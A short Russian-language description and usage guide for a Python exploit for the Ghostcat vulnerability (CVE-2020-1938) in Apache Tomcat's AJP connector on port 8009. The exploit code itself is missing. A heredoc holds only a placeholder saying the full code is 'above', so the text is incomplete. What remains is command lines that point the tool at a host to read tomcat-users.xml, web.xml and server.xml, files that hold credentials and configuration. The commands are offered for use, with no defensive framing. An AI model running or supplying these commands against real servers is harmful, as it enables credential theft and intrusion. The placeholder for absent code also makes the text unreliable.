
Эксплойт на Python для CVE-2020-1938 (Ghostcat), который читает произвольные файлы с серверов Apache Tomcat через AJP-коннектор на порту 8009, включая файлы конфигурации и учетных данных.
Ghostcat - CVE-2020-1938 Эксплойт Читает файлы Tomcat через AJP-коннектор (порт 8009) Использование: python3 ghostcat.py [файл]
cat > ghostcat.py << 'PYEOF' [ЗДЕСЬ ПОЛНЫЙ КОД ВЫШЕ] PYEOF
chmod +x ghostcat.py
python3 ghostcat.py ejemplo.com conf/tomcat-users.xml 8009
python3 ghostcat.py ejemplo.com WEB-INF/web.xml 8009
python3 ghostcat.py ejemplo.com conf/server.xml 8009